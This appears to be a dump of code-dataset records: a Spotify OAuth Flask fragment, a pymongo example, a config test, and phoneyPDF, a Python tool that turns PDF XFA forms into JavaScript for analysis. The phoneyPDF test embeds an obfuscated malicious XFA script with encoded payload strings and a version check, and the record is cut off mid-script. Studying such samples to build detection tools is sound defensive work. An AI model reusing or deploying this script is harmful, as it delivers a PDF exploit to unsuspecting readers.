callback():\n # Auth Step 4: Requests refresh and access tokens\n auth_code = request.args['code']\n code_payload = {\n \"grant_type\": \"authorization_code\",\n \"code\": str(auth_code),\n \"redirect_uri\": REDIRECT_URI\n }\n\n base64encoded = base64.b64encode(bytes(\"{}:{}\".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {\"Authorization\": \"Basic {}\".format(base64encoded.decode('utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)\n\n # Auth Step 5: Tokens are Returned to Application\n response_data = json.loads(post_request.text)\n access_token = response_data[\"access_token\"]\n print(access_token)\n refresh_token = response_data[\"refresh_token\"]\n token_type = response_data[\"token_type\"]\n expires_in = response_data[\"expires_in\"]\n\n redirect_to_index = redirect(\"http://localhost:3000/\")\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected](\"/refresh_token\", methods=['POST'])\ndef refresh_token():\n # 7. Requesting access token from refresh token\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token\n }\n base64encoded = base64.b64encode(bytes(\"{}:{}\".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {\"Authorization\": \"Basic {}\".format(base64encoded.decode('utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object
mydb = myclient['mydatabase'] #Create a database
mycol = mydb['customers'] #Create a collection into my mydatabase
mydict = [{"name": "Eric", "address": "Highway 37"}, {"name": "Albert", "address": "Highway 37"}, {"name": "Ivan", "address": "Highway 37"}]
x = mycol.insert_many(mydict)
myquery = {'name':'Albert'}
mydoc = mycol.find()
print(mydoc)
|
normal
|
{
"blob_id": "6c6026a7ff0345c37e62de7c0aac0ee3bcde2c82",
"index": 5879,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(mydoc)\n",
"step-3": "<mask token>\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-4": "import pymongo\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-5": "import pymongo\n\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object\n\nmydb = myclient['mydatabase'] #Create a database\n\nmycol = mydb['customers'] #Create a collection into my mydatabase\n\nmydict = [{\"name\": \"Eric\", \"address\": \"Highway 37\"}, {\"name\": \"Albert\", \"address\": \"Highway 37\"}, {\"name\": \"Ivan\", \"address\": \"Highway 37\"}]\n\nx = mycol.insert_many(mydict)\n\nmyquery = {'name':'Albert'}\n\nmydoc = mycol.find()\n\nprint(mydoc)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from src.config import Config
mock = {
"entities": {
"foo": [ "bar", "foobar" ]
},
"synonimous": {
"fizz": [ "fizzfuzz", "fuzz"]
},
"templates": [
{
"text": "{synonimous.fizz} and {entities.foo}",
"intention": "fizzfoo"
}
]
}
def test_should_config_start_correctly():
c = Config(mock)
assert c._entities == mock['entities']
assert c._synonimous == mock['synonimous']
assert c.templates == mock['templates']
assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']
|
normal
|
{
"blob_id": "987f8ce668f2002b731822fa5f3de143a80aaafe",
"index": 9807,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-3": "<mask token>\nmock = {'entities': {'foo': ['bar', 'foobar']}, 'synonimous': {'fizz': [\n 'fizzfuzz', 'fuzz']}, 'templates': [{'text':\n '{synonimous.fizz} and {entities.foo}', 'intention': 'fizzfoo'}]}\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-4": "from src.config import Config\nmock = {'entities': {'foo': ['bar', 'foobar']}, 'synonimous': {'fizz': [\n 'fizzfuzz', 'fuzz']}, 'templates': [{'text':\n '{synonimous.fizz} and {entities.foo}', 'intention': 'fizzfoo'}]}\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-5": "from src.config import Config\n\nmock = {\n \"entities\": {\n \"foo\": [ \"bar\", \"foobar\" ]\n },\n \"synonimous\": {\n \"fizz\": [ \"fizzfuzz\", \"fuzz\"]\n },\n \"templates\": [\n {\n \"text\": \"{synonimous.fizz} and {entities.foo}\",\n \"intention\": \"fizzfoo\"\n }\n ]\n}\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
XFA/XDP DOM in Javascript
This file is part of the phoneyPDF Framework
This module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects
in javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and
maintained as the PDF is 'rendered'.
Trevor Tonn <[email protected]>
Copyright (c) 2013, VERISIGN, Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VERISIGN nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from lxml import etree
DEBUG = True
def removeNamespace(element, logger):
'''
Removes the namespace stuff from an element's tag attr. Probably a bad idea.
'''
if not element.nsmap:
logger.info("empty nsmap")
return
for key in element.nsmap:
val = element.nsmap[key]
s = "{%s}" % val
logger.debug("removing %s => %s: %s" % (key, val, s))
element.tag = element.tag.replace(s, "")
def elementToJS(element, jsStrL, logger):
logger.debug("converting element '%s'" % element.tag)
origTag = element.tag
removeNamespace(element, logger)
if origTag != element.tag:
logger.debug(" -- tag had namespace removed; new tag: %s" % element.tag)
# add element first
jsStrL.append("%s = new Element('%s');" % (element.tag, element.tag))
# see if there's any text
if element.text:
# we will likely need to escape chars like ' and " to make this work...
jsStrL.append("%s.text = \"%s\";" % (element.tag, element.text.strip()))
# add children both by their tagname and as integers
index = 0
for childElement in element.getchildren():
# create child recursively
elementToJS(childElement, jsStrL, logger)
if element.tag == 'subform':
#TODO: process subform for field names
pass
# now, add this child both as a property and something accessible via index
jsStrL.append("%s.%s = %s;" % (element.tag, childElement.tag, childElement.tag))
jsStrL.append("%s[%d] = %s;" % (element.tag, index, childElement.tag))
index += 1
def xmlToJS(xml, logger):
'''
Takes an LXML element tree and converts it into javascript code that, when executed by
a javascript engine, will create a very similar structure that can be manipulated in
javascript land by other scripts.
Returns a string of javascript suitable for eval()'ing.
'''
# Prepare the javascript string with a defintion of our 'Element' object
jsStrL = ["""
function Element(tag) {
this.tag = tag;
// this needs a lot more stuff added to it...
}
"""]
# Convert XML elements into a tree of javascript objects
try:
elementToJS(xml, jsStrL, logger)
except Exception,e:
logger.warn(e)
pass
return '\n'.join(jsStrL)
def getExposedObjects():
'''
Adobe Reader has all sorts of objects that are defined under the hood and exposed to javascript.
This method returns a string of javascript which contains definitions for those objects.
'''
defsStr = """
var app = Object();
"""
return defsStr
def test_xmlToJS():
#x="""<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language="javascript">print( f(p,q) );</script></ggg></subform2></xfa>"""
y="""<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="kos"><pageSet><pageArea id="rya" name="rya"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform h="756pt" w="576pt" name="upo"><field h="65mm" name="sac" w="85mm" x="53.6501mm" y="88.6499mm"><event activity="initialize" name="cum"><script contentType="application/x-javascript">
abo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1XoizbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaIe2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05caS7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>"""
xml=etree.fromstring(y)
jsStr = xmlToJS(xml)
print jsStr
if __name__ == "__main__":
test_xmlToJS()
|
normal
|
{
"blob_id": "59b2d0ff3296c9d9a76b8b69a784d5a0c46128be",
"index": 8080,
"step-1": "'''\nXFA/XDP DOM in Javascript\nThis file is part of the phoneyPDF Framework\n\nThis module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects\nin javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and\nmaintained as the PDF is 'rendered'.\n\nTrevor Tonn <[email protected]>\n\nCopyright (c) 2013, VERISIGN, Inc\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n * Neither the name of VERISIGN nor the names of its contributors\n may be used to endorse or promote products derived from this software\n without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nfrom lxml import etree\nDEBUG = True\n\ndef removeNamespace(element, logger):\n '''\n Removes the namespace stuff from an element's tag attr. Probably a bad idea.\n '''\n if not element.nsmap:\n logger.info(\"empty nsmap\")\n return\n\n for key in element.nsmap:\n val = element.nsmap[key]\n s = \"{%s}\" % val\n logger.debug(\"removing %s => %s: %s\" % (key, val, s))\n element.tag = element.tag.replace(s, \"\")\n\ndef elementToJS(element, jsStrL, logger):\n logger.debug(\"converting element '%s'\" % element.tag)\n origTag = element.tag\n removeNamespace(element, logger)\n if origTag != element.tag:\n logger.debug(\" -- tag had namespace removed; new tag: %s\" % element.tag)\n\n # add element first\n jsStrL.append(\"%s = new Element('%s');\" % (element.tag, element.tag))\n\n # see if there's any text\n if element.text:\n # we will likely need to escape chars like ' and \" to make this work...\n jsStrL.append(\"%s.text = \\\"%s\\\";\" % (element.tag, element.text.strip()))\n\n # add children both by their tagname and as integers\n index = 0\n for childElement in element.getchildren():\n # create child recursively\n elementToJS(childElement, jsStrL, logger)\n\n if element.tag == 'subform':\n #TODO: process subform for field names\n pass\n # now, add this child both as a property and something accessible via index\n jsStrL.append(\"%s.%s = %s;\" % (element.tag, childElement.tag, childElement.tag))\n jsStrL.append(\"%s[%d] = %s;\" % (element.tag, index, childElement.tag))\n index += 1\ndef xmlToJS(xml, logger):\n '''\n Takes an LXML element tree and converts it into javascript code that, when executed by\n a javascript engine, will create a very similar structure that can be manipulated in\n javascript land by other scripts.\n\n Returns a string of javascript suitable for eval()'ing.\n '''\n # Prepare the javascript string with a defintion of our 'Element' object\n jsStrL = [\"\"\"\n function Element(tag) {\n this.tag = tag;\n // this needs a lot more stuff added to it...\n }\n\n \"\"\"]\n\n # Convert XML elements into a tree of javascript objects\n try:\n elementToJS(xml, jsStrL, logger)\n except Exception,e:\n logger.warn(e)\n pass\n return '\\n'.join(jsStrL)\n\ndef getExposedObjects():\n '''\n Adobe Reader has all sorts of objects that are defined under the hood and exposed to javascript.\n This method returns a string of javascript which contains definitions for those objects.\n '''\n defsStr = \"\"\"\nvar app = Object();\n\"\"\"\n\n return defsStr\n\ndef test_xmlToJS():\n #x=\"\"\"<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language=\"javascript\">print( f(p,q) );</script></ggg></subform2></xfa>\"\"\"\n y=\"\"\"<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.5/\"><subform layout=\"tb\" locale=\"en_US\" name=\"kos\"><pageSet><pageArea id=\"rya\" name=\"rya\"><contentArea h=\"756pt\" w=\"576pt\" x=\"0.25in\" y=\"0.25in\"/><medium long=\"792pt\" short=\"612pt\" stock=\"default\"/></pageArea></pageSet><subform h=\"756pt\" w=\"576pt\" name=\"upo\"><field h=\"65mm\" name=\"sac\" w=\"85mm\" x=\"53.6501mm\" y=\"88.6499mm\"><event activity=\"initialize\" name=\"cum\"><script contentType=\"application/x-javascript\">\nabo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1XoizbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5